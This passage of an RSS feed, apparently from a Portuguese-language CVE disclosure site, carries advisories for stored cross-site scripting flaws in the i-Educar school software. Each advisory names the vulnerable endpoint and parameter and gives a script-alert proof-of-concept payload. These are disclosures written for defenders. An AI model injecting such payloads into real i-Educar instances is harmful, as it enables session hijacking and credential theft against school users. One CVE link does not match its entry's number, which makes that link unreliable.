        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7867.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7867.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 20 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7868</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-7868/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-7868/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7868-cross-site-scripting-xss-armazenado-no-endpoint-educar_calendario_dia_motivo_cadphp-parâmetro-cod_calendario_dia_motivo&amp;#34;&amp;gt;CVE-2025-7868: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_calendario_dia_motivo_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;cod_calendario_dia_motivo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-78668&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-78668&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_calendario_dia_motivo_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;cod_calendario_dia_motivo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_calendario_dia_motivo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7868-cross-site-scripting-xss-armazenado-no-endpoint-educar_calendario_dia_motivo_cadphp-parâmetro-cod_calendario_dia_motivo&amp;#34;&amp;gt;CVE-2025-7868: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_calendario_dia_motivo_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;cod_calendario_dia_motivo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-78668&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-78668&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_calendario_dia_motivo_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;cod_calendario_dia_motivo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_calendario_dia_motivo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;cod_calendario_dia_motivo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;cod_calendario_dia_motivo&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB i-Educar PaCXXX&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7868/image-1.png&amp;#34;
	width=&amp;#34;1895&amp;#34;
	height=&amp;#34;984&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7868/image-1_hu_97d38405728c544.png 480w, /p/cve-2025-7868/image-1_hu_3a6a150e1d9596b7.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;192&amp;#34;
		data-flex-basis=&amp;#34;462px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7868/image.png&amp;#34;
	width=&amp;#34;1908&amp;#34;
	height=&amp;#34;969&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7868/image_hu_a173bc0dd1ee021a.png 480w, /p/cve-2025-7868/image_hu_61aa51eb4a1fba4a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;196&amp;#34;
		data-flex-basis=&amp;#34;472px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;vídeo-poc&amp;#34;&amp;gt;Vídeo PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/RtXMxNLuAx8&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/RtXMxNLuAx8&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7868.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7868.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 20 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7869</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-7869/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-7869/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7869-cross-site-scripting-xss-armazenado-no-endpoint-educar_turma_tipo_detphp-parâmetro-cod_turma_tipo&amp;#34;&amp;gt;CVE-2025-7869: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_turma_tipo_det.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;cod_turma_tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7869&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7869&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_turma_tipo_det.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;cod_turma_tipo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_turma_tipo_det.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7869-cross-site-scripting-xss-armazenado-no-endpoint-educar_turma_tipo_detphp-parâmetro-cod_turma_tipo&amp;#34;&amp;gt;CVE-2025-7869: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_turma_tipo_det.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;cod_turma_tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7869&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7869&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_turma_tipo_det.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;cod_turma_tipo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_turma_tipo_det.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;cod_turma_tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;cod_turma_tipo&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB i-Educar PaCXXX&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7869/image.png&amp;#34;
	width=&amp;#34;1869&amp;#34;
	height=&amp;#34;982&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7869/image_hu_a2589e8ed4337362.png 480w, /p/cve-2025-7869/image_hu_17deafef38d887a2.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;190&amp;#34;
		data-flex-basis=&amp;#34;456px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7869/image-1.png&amp;#34;
	width=&amp;#34;1908&amp;#34;
	height=&amp;#34;961&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7869/image-1_hu_fab2a14a1c166956.png 480w, /p/cve-2025-7869/image-1_hu_8f2641744613856f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;198&amp;#34;
		data-flex-basis=&amp;#34;476px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;vídeo-poc&amp;#34;&amp;gt;Vídeo PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/RtXMxNLuAx8&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/RtXMxNLuAx8&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7869.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7869.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 20 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7870</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-7870/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-7870/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7870-cross-site-scripting-xss-armazenado-via-upload-de-svg&amp;#34;&amp;gt;CVE-2025-7870: Cross-Site Scripting (XSS) Armazenado via Upload de SVG
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7870&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
